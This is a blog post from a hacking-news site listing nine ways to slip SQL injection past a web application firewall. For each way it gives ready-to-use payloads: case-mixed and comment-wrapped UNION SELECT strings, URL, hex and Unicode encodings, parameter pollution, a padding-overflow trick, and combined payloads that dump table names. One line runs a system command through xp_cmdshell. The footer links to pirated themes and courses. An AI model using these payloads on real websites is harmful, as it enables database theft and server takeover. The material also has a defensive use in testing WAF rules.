SQL injection: 9 ways to bypass Web Application Firewall – DigitalMunition

Hacking News tM8MPgW

Published on February 21st, 2018 📆 | 6306 Views ⚑


SQL injection: 9 ways to bypass Web Application Firewall

web application firewall (or WAF) filters, monitors, and blocks HTTP traffic to and from a web application. A WAF is differentiated from a regular firewall in that a WAF is able to filter the content of specific web applications while regular firewalls serve as a safety gate between servers. By inspecting HTTP traffic, it can prevent attacks stemming from web application security flaws, such as SQL injectioncross-site scripting (XSS), file inclusion, and security misconfigurations.__Wiki

How WAF work?

  • Exception Detection Protocol: Denies requests that do not meet HTTP standards
  • Enhanced input validation: Proxy and server-side validation, not just client-side validation
  • WhiteList & Blacklist
  • Rule-based and exception-based protection: more black-based mechanisms based on rules, more flexible based on exceptions
  • State management: focus on session protectionThere are also: Cookies protection, anti-intrusion avoidance technology, response monitoring and information disclosure protection.

How to bypass WAF

  1. Mixed CaseChange case of malicious input triggering WAF protections. union may become uNIoN, If the WAF is using a case sensitive blacklist, changing case may bypass that filter.
    http://target.com/index.php?page_id=-15 uNIoN sELecT 1,2,3,4


  2. Replace the keyword(Insert special characters that will be removed by WAF) – SELECT may become SEL<ECT which would be passed on as SELECT once the offending character is removed.
    http://target.com/index.php?page_id=-15&nbsp;UNIunionON SELselectECT 1,2,3,4
  3. Encode
    + URL encode

    page.php?id=1%252f%252a*/UNION%252f%252a /SELECT

    +Hex encode

    target.com/index.php?page_id=-15 /*!u%6eion*/ /*!se%6cect*/ 1,2,3,4…

    +Unicode encode

       SELECT 'Ä'='A'; #1
  4. Use comments
    Insert comments in middle of attack strings. For instance, /*!SELECT*/ might be overlooked by the WAF but passed on to the target application and processed by a mysql database.

    index.php?page_id=-15 %55nION/**/%53ElecT 1,2,3,4   
       'union%a0select pass from users#
    index.php?page_id=-15 /*!UNION*/ /*!SELECT*/ 1,2,3


  5.  Equivalent functions and commands
    Some functions or commands can not be used because this keywords are detected, but in many cases we can be used with equivalent or similar code of them.

    hex()、bin() ==> ascii()
    sleep() ==>benchmark()
     substr((select 'password'),1,1) = 0x70
       strcmp(left('password',1), 0x69) = 1
         strcmp(left('password',1), 0x70) = 0
       strcmp(left('password',1), 0x71) = -1
    mid()、substr() ==> substring()
    @@user ==> user()
    @@datadir ==> datadir()




  6. Special symbolsHere I have non-alphanumeric characters in the special symbols of a class, special symbols have a special meaning and usage.
    + ` symbol: select `version()`;
    + +- :select+id-1+1.from users;
    + @:select@^1.from users;
    +Mysql function() as xxx
    +`、~、!、@、%、()、[]、.、-、+ 、|、%00

          %S%E%L%E%C%T 1
          1.aspx?id=1;EXEC(‘ma’+'ster..x’+'p_cm’+'dsh’+'ell ”net user”’)
    ' or --+2=- -!!!'2
  7. HTTP parameter controlSupply multiple parameter= value sets of the same name to confuse the WAF. Given the example http://example.com?id=1&?id=’ or ‘1’=’1′ — ‘ in some circumstances such as with Apache/PHP, the application will only parse the last (second) instance of id= while the WAF only parses the first. It appears to be a legitimate request but the application still receives and process malicious input. Most WAF’s today are not vulnerable to HTTP Parameter Pollution (HPP) but it is still worth a try when building bypasses.
    + HPP (HTTP Parameter Polution)



    HPP is also known as repeated parameter contamination, the simplest is: uid = 1 & uid = 2 & uid = 3, for this case, different Web server processing as follows:

    +HPF (HTTP Parameter Fragment)

    This method is HTTP segmentation injection, similar to CRLF (using control characters% 0a,% 0d, etc. to perform line breaks)

      select * from table where a=1 union/* and b=*/select 1,pass/* limit */from users—

    +HPC (HTTP Parameter Contamination)
    RFC2396 defines the following characters:

    Unreserved: a-z, A-Z, 0-9 and _ . ! ~ * ' ()
    Reserved : ; / ? : @ &amp; = + $ ,
    Unwise : { } | \ ^ [ ] `

    Different Web server processing processes have different logic when constructing special requests:

    In the case of the magic character %, Asp / Asp.net will be affected

  8. Buffer overflowWAF’s are, afterall, applications and vulnerable to the same software flaws as any other application. If a buffer overflow condition can create a crash, even if it does not result in code execution, this may result in a WAF failing open. In other words, a bypass.
    ?id=1 and (select 1)=(Select 0xA*1000)+UnIoN+SeLeCT+1,2,version(),4,5,database(),user(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26
  9.  IntegrationIntegration means the use of a variety of bypass technology, a single technology may not be able to bypass the filtering mechanism, but the use of a variety of technologies with the possibility of success will increase a lot.
    target.com/index.php?page_id=-15+and+(select 1)=(Select 0xAA[..(add about 1000 "A")..])+/*!uNIOn*/+/*!SeLECt*/+1,2,3,4…
    id=1/*!UnIoN*/+SeLeCT+1,2,concat(/*!table_name*/)+FrOM /*information_schema*/.tables /*!WHERE */+/*!TaBlE_ScHeMa*/+like+database()– -

Reference: bypasswaf

Premium WordPress Themes Download
Download Premium WordPress Themes Free
Download Best WordPress Themes Free Download
Download WordPress Themes
download udemy paid course for free

Leave a Reply ✍